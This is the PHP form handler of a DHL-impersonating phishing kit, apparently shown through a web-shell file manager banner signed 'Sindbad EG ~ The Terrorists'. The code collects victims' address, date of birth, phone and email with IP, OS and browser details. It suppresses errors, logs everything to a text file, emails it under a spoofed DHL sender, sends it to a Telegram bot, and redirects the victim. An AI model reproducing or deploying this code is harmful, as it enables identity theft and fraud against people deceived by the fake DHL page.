Sindbad~EG File Manager
<?php
session_start();
error_reporting(E_ERROR | E_WARNING | E_PARSE | E_NOTICE);
@ini_set('html_errors', '0');
@ini_set('display_errors', '0');
@ini_set('display_startup_errors', '0');
@ini_set('log_errors', '0');
include('../Variablex/Protection.php');
include('../Variablex/COUNTRY.php');
include('../Variablex/SYS.php');
include('../Variablex/XTelegram.php');
if (isset($_POST['submit'])) {
$message = "🌐 *-----[DHL - Payment INFO]-----*\n";
$message .= "🏠 Address: " . $_POST['adress'] . "\n";
$message .= "🌆 City: " . $_POST['city'] . "\n";
$message .= "🎂 Date of Birth: " . $_POST['dob'] . "\n";
$message .= "📮 Zip Code: " . $_POST['zip'] . "\n";
$message .= "☎️ Phone Number: " . $_POST['phone'] . "\n";
$message .= "📧 Email: " . $_POST['email'] . "\n";
$message .= "🌍 *------[DHL - USER DATA]------*\n";
$message .= "📍 Country: #" . $get_user_country . "\n";
$message .= "🖥️ IP Address: $ip\n";
$message .= "💻 Operating System: $user_os\n";
$message .= "🌐 Browser: $user_browser\n";
$message .= "⏰ Time: $date\n";
$subject = "+-----[INFO-DHL]-----+";
$headers = "From: INFO@DHL.com\r\n";
$headers .= "Content-Type: text/plain; charset=UTF-8\r\n";
mail($to, $subject, $message, $headers);
$file = fopen('XD.txt', 'a');
fwrite($file, $message . "\n");
fclose($file);
$data = [
'text' => $message,
'chat_id' => $chat_id,
];
file_get_contents("https://api.telegram.org/bot$token/sendMessage?" . http_build_query($data));
header('Location: ../B.php?cred=1#sHFHJHDHDHKJDJDSDSJDSJKJDSJDSDJJDSHYKJHGFG');
exit;
}
?>
Sindbad File Manager Version 1.0, Coded By Sindbad EG ~ The Terrorists